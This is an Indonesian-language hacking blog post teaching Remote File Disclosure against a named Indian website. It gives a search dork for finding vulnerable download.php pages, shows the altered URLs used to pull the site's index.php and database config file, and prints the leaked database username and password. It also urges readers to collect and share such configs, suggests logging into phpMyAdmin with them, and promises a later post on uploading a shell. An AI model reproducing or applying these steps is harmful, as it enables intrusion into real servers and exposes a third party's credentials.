Tutorial Hacking Website dengan metode RFD (Remote File Disclosure) berguna untuk mencari File Config atau semua yang berhubungan dengan Datababase, jadi kumpulin config sebanyak-banyaknya ya,. jangan lupa bagi-bagi :*
Untuk Dorknya :
"inurl:download.php?file=" site:in ---> Khusus buat site india, bisa di sesuaikan
Target kali ini >> http://kiteodisha.co.in/
langkah pertama yang kita lakukan harus mencari Link Downloadnya,
Ini dia link Tempat Downloadnya>> http://kiteodisha.co.in/download.php?file=..blablabla
coba kita ubah menjadi>> http://kiteodisha.co.in/download.php?file=index.php
Berguna untuk mendownload index.php asli website tersebut :)
Nahhh.. itu kan berhasil, sekarang kita coba Open with Notepad aja =))
apaan sih isinya =))
Ternyata ada file Confignya =)) asyiikkkk.. =))sekarang coba kita akses dengan kode url >> http://kiteodisha.co.in/download.php?file=dbcon.php
Jngan lupa open with Notepad =))
dan lihat apa yang kita dapatkan =))
Next kita telah berhasil mendapatkan file confignya :)
$con=mysql_connect("localhost","kiteodis_kites","kites123");
$db=mysql_select_db("kiteodis_kites",$con);
$db=mysql_select_db("kiteodis_kites",$con);
Setelah itu terserah ama om-om itu file mau di apain, bisa aja login ke halaman phpmyadmin nya,
sekian dari saya, buat yang master di lewat.. dan untuk upload shell dari phpmyadmin next poting yah =)) kwkwkwkwk.. Enjoy >>
Greets >> Medan Cayber Team
Greets >> Medan Cayber Team
0 komentar:
Post a Comment